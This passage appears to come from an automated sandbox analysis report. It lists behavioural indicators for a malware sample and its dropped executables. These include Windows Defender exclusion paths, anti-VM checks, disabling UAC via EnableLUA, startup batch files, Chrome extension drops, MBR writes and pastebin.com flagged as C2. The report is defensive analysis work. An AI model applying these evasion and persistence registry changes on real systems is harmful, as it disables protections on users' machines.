| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\krdeMCnRKomDOvwVunR = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tegRANPZONsU2 = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\SysWOW64\reg.exe | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\360AvFlt.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Windows\system32\drivers\BAPIDRV64.SYS | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Windows\system32\drivers\360netmon.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Windows\system32\drivers\360Box64.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File opened for modification | C:\Windows\system32\drivers\360fsflt.sys | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| File created | C:\Windows\system32\drivers\360fsflt.sys | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| File created | C:\Windows\system32\drivers\360Camera64.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File created | C:\Windows\system32\drivers\360AntiHacker64.sys | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Modifies Installed Components in the registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A} | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ = "RootsUpdate" | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\IsInstalled = "1" | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Version = "41,0,2195,0" | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\Locale = "*" | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{EF289A85-8E57-408d-BE47-73B55609861A}\ComponentID = "Windows Roots Update" | C:\Program Files (x86)\360\Total Security\modules\KB931125-rootsupd.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360FsFlt\ImagePath = "system32\\DRIVERS\\360FsFlt.sys" | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360netmon\ImagePath = "system32\\DRIVERS\\360netmon.sys" | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360AvFlt\ImagePath = "system32\\DRIVERS\\360AvFlt.sys" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\BAPIDRV\ImagePath = "system32\\DRIVERS\\BAPIDRV64.sys" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360Camera\ImagePath = "System32\\Drivers\\360Camera64.sys" | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360AntiHacker\ImagePath = "System32\\Drivers\\360AntiHacker64.sys" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\360Box64\ImagePath = "system32\\DRIVERS\\360Box64.sys" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zSE4E3.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\SysWOW64\rundll32.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Control Panel\International\Geo\Nation | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QjjcirHVZkfyrDMqPtw9nST7.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Smnj1oABLb3IC3p5awBLhEvK.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pbjv3x2wWiEMiAN5EoFmBmGS.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VaOB6ps0mdB1ZGhWvH5a0CBP.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ewtkKzimK9QQmn9KgYI9lf5Q.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\62ff8a0e3f1d6be4a1fcd7500524d92861270e431b487f36130ef39945482a22_NeikiAnalytics.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe | N/A |
Loads dropped DLL
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\SD360\ = "{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}" | C:\Windows\system32\regsvr32.exe | N/A |
Reads user/profile data of web browsers
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32 | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ = "C:\\Program Files (x86)\\360\\Total Security\\MenuEx64.dll" | C:\Windows\system32\regsvr32.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{086F171D-5ED1-4ED2-B736-CFF3AD6A128E}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\regsvr32.exe | N/A |
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 52.209.66.100 | N/A | N/A |
| Destination IP | 52.209.66.100 | N/A | N/A |
| Destination IP | 54.194.203.69 | N/A | N/A |
| Destination IP | 52.209.66.100 | N/A | N/A |
| Destination IP | 54.76.137.217 | N/A | N/A |
| Destination IP | 54.76.131.57 | N/A | N/A |
| Destination IP | 54.194.203.69 | N/A | N/A |
| Destination IP | 54.76.131.57 | N/A | N/A |
| Destination IP | 52.209.66.100 | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" /start" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QHSafeTray = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHSafeTray.exe\" /start" | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\DisplayName = "360 Total Security" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Avira | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath = "\"C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe\"" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ObjectName = "LocalSystem" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Eset\NOD\CurrentVersion\Info | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\DisplayName | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Type = "16" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ImagePath | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Start | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Group = "TDI" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Start = "2" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Eset\NOD\CurrentVersion\Info | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Group | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\Type | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ErrorControl = "1" | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ErrorControl | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QHActiveDefense\ObjectName | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
Enumerates connected drives
Installs/modifies Browser Helper Object
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{B69F34DD-F0F9-42DC-9EDD-957187DA688D} | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{B69F34DD-F0F9-42DC-9EDD-957187DA688D}\NoExplorer = "1" | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\360\Total Security\safemon\PopWndLog.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Pictures\KUjGJaECFDsncDIjZI6NJy59.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\1717040751_0\360TS_Setup.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\360WD\wdch.dat | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\360WD\wdch.dat-journal | C:\Program Files (x86)\360\Total Security\safemon\QHActiveDefense.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\frDbhUXJJbPEeVC\VkQpaXL.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\fhxvenN.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\pNS5nWFOnPuRyVaJWEap6nB1.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
